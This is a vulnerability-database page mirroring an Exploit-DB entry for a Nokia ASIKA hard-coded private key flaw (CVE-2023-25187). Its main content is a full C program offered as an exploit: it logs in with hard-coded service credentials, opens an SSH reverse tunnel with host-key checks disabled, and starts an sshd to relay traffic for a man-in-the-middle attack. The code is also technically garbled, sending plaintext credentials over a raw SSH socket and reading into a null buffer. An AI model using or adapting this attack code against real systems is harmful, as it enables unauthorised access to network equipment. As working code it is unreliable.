Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Nokia ASIKA 7.13.52 - Hard-coded private key disclosure

🗓️ 20 Jun 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 251 Views

Nokia ASIKA 7.13.52 Hard-coded private key disclosure in SSH connection handling on Windows/Linux with CVE-2023-2518

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Nokia ASIKA 7.13.52 - Hard-coded private key disclosure Exploit
26 Jun 202300:00
zdt
ATTACKERKB		CVE-2023-25187
16 Jun 202320:15
attackerkb
Circl		CVE-2023-25187
21 Feb 202319:21
circl
CNNVD		Nokia Airscale ASIKA Single RAN 信任管理问题漏洞
16 Jun 202300:00
cnnvd
CVE		CVE-2023-25187
16 Jun 202300:00
cve
Cvelist		CVE-2023-25187
16 Jun 202300:00
cvelist
EUVD		EUVD-2023-29151
3 Oct 202520:07
euvd
NVD		CVE-2023-25187
16 Jun 202320:15
nvd
OSV		CVE-2023-25187
16 Jun 202320:15
osv
Packet Storm		Nokia ASIKA 7.13.52 Private Key Disclosure
21 Jun 202300:00
packetstorm
Rows per page
// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure
// Date: 2023-06-20
// Exploit Author: Amirhossein Bahramizadeh
// Category : Hardware
// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/
// Version: 7.13.52 (REQUIRED)
// Tested on: Windows/Linux
// CVE : CVE-2023-25187

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <signal.h>

// The IP address of the vulnerable device
char *host = "192.168.1.1";

// The default SSH port number
int port = 22;

// The username and password for the BTS service user account
char *username = "service_user";
char *password = "password123";

// The IP address of the attacker's machine
char *attacker_ip = "10.0.0.1";

// The port number to use for the MITM attack
int attacker_port = 2222;

// The maximum length of a message
#define MAX_LEN 1024

// Forward data between two sockets
void forward_data(int sock1, int sock2)
{
    char buffer[MAX_LEN];
    ssize_t bytes_read;

    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)
    {
        write(sock2, buffer, bytes_read);
    }
}

int main()
{
    int sock, pid1, pid2;
    struct sockaddr_in addr;
    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};

    // Create a new socket
    sock = socket(AF_INET, SOCK_STREAM, 0);

    // Set the address to connect to
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    inet_pton(AF_INET, host, &addr.sin_addr);

    // Connect to the vulnerable device
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
    {
        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));
        exit(1);
    }

    // Send the SSH handshake
    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);
    read(sock, NULL, 0);

    // Send the username
    write(sock, username, strlen(username));
    write(sock, "\r\n", 2);
    read(sock, NULL, 0);

    // Send the password
    write(sock, password, strlen(password));
    write(sock, "\r\n", 2);

    // Wait for the authentication to complete
    sleep(1);

    // Start an SSH client on the attacker's machine
    pid1 = fork();
    if (pid1 == 0)
    {
        execv("/usr/bin/ssh", argv);
        exit(0);
    }

    // Start an SSH server on the attacker's machine
    pid2 = fork();
    if (pid2 == 0)
    {
        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);
        exit(0);
    }

    // Wait for the SSH server to start
    sleep(1);

    // Forward data between the client and the server
    pid1 = fork();
    if (pid1 == 0)
    {
        forward_data(sock, STDIN_FILENO);
        exit(0);
    }
    pid2 = fork();
    if (pid2 == 0)
    {
        forward_data(STDOUT_FILENO, sock);
        exit(0);
    }

    // Wait for the child processes to finish
    waitpid(pid1, NULL, 0);
    waitpid(pid2, NULL, 0);

    // Close the socket
    close(sock);

    return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jun 2023 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.3 - 7
EPSS0.00175
SSVC
nokia asika 7.13.52private key disclosuressh connectionwindowslinuxcve-2023-25187
251